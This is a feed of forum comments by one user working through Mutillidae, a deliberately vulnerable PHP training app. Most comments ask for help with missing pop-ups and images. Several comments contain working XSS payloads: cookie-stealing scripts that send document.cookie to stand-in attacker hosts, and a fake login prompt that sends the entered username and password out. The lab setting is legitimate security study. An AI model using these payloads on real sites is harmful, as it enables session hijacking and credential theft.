Disqus - Latest Comments for Yaggihttp://disqus.com/by/Yaggi/enThu, 24 Sep 2009 05:37:20 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284291<p>My question is that when using Password Con XSS script, there is no pop-up box that will ask the username and password</p>YaggiThu, 24 Sep 2009 05:37:20 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284182<p>Correction<br>Using this script below, the attackers machine is able to gather the cookie information<br>Cookie Stealing:<br>&lt;script&gt; new Image().src="http://attacker_IP/Mutillidae/catch.php?cookie="+encodeURI(document.cookie); &lt;/script&gt;</p>YaggiThu, 24 Sep 2009 05:28:36 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284162<p>Using this script below, the attackers machine is able to gather the cookie information<br>Cookie Stealing:<br>&lt;script&gt; new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); &lt;/script&gt;</p><p>but on this script Password Con XSS, when I view the log of everyone there was no event or pop-up box, I mean that in the tutorial there was a pop-up box asking us the username and password then the attacker will get the cookie<br></p>YaggiThu, 24 Sep 2009 05:27:43 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284027<p>In the attacker machines, I setup the same like the target (but leave the httpd.conf default)<br>I put the Mutillidae in c:\xamp\htdocs\Mutillidae; so I change the script some thing like below...No Box has pop-up</p><p>Password Con XSS:<br>&lt;script&gt; <br>username=prompt('Please enter your username',' '); <br>password=prompt('Please enter your password',' ');<br> document.write("&lt;img src="\"http://attackers_IP/Mutillidae/catch.php?username="+username+"&amp;amp;password="+password+"\""&gt;");<br> &lt;/script&gt;</p><p>Please help</p>YaggiThu, 24 Sep 2009 05:21:09 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17283948<p>There were no images, should I download it? where?</p>YaggiThu, 24 Sep 2009 05:16:57 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17283403<p>I have trouble doing the test, In the Mutillidae file there are no images like making the clippy pop-up and password con did not give the pop-up box and the Form.<br>Do we have do download all the images? Sorry for this noob question</p>YaggiThu, 24 Sep 2009 04:42:33 -0000Re: OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and ...http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville#comment-17282217<p>HI,</p><p>Using the password con: There is no box pop-up to ask the password and username, is this another image?</p>YaggiThu, 24 Sep 2009 03:30:19 -0000Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement The OWASP Top 10http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17210758<p>Great Stuff, I wonder if you will be posting a video how to audit,attack,exploit Mutillidae from the backtrack's W3af framework</p>YaggiWed, 23 Sep 2009 06:18:24 -0000